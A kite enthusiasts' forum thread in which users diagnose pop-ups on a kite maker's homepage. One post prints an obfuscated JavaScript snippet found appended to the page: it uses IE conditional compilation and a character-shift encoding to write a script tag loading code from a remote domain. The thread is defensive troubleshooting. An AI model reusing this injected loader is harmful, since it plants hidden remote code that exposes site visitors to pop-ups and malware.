Welcome to the GWTW Forum.
Guests (non-registered users) can view the forum but are unable to post.  If you don't have anything to say then why would you bother to register?
One of the most popular sections of the GWTW Forum has long been the Swap Meet.  A great place to sell old, seldom flown kites or to get great deals on used (gently flown) kites.  Only registered users can see the Swap Meet section, let alone wheel and deal.  1000's (literally) of kites have changed hands thanks to the Swap Meet.
There are several more benefits to being a registered user, but you'll have to join our little community to find out all the "secrets".

The page has been hijacked by some sort of internet crap. More than likely, the page expired, and the owner needs to renew it or loose it.
I get the original page for a split second, and then the pop-ups start. Hope the page is renewed, and it's not a sign of another kite company going out...

I found no issue with the site.

Must86, if you are getting redirected then I would check your system for spyware

For those of you having.... shall we say issues.... try jumping straight to the kites page here and see what happens 'cos the entire site is both fine and dandy* for me just now.

More likely, you've been hijacked and don't know it.
Shawn's site is fine.  Wink

I *might* be fine, but I tried to go there from work the other day - and corporate anti-phishing/spam/whatever flagged it as hazardous. I don't believe that stuff doesn't runs local to my machine and I do work for a very large corp. who spend a lot of dough on this sort of stuff.

I have the same problem.  Going directly to the kite page works though.

Aha. There is an interesting bit of code tagged on outside the HTML tag that will lead you to pop ups under certain conditions. It's only on the homepage so won't be seen if jumping straight to the Kites page.

/*@cc_on
   @if (@_win32)
z=0;while(z<87)document.write(String.fromCharCode('=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00ipudpoofdufe/dpn0tdsjqu0hmpcbm/kt#?=0tdsjqu?'.charCodeAt(z++)-1))
  @end
@*/

So yes... summat's up but not using IE and having a suitably savvy anti-whatever program would hide this from most people. Someone let Shawn know so he can excise this.
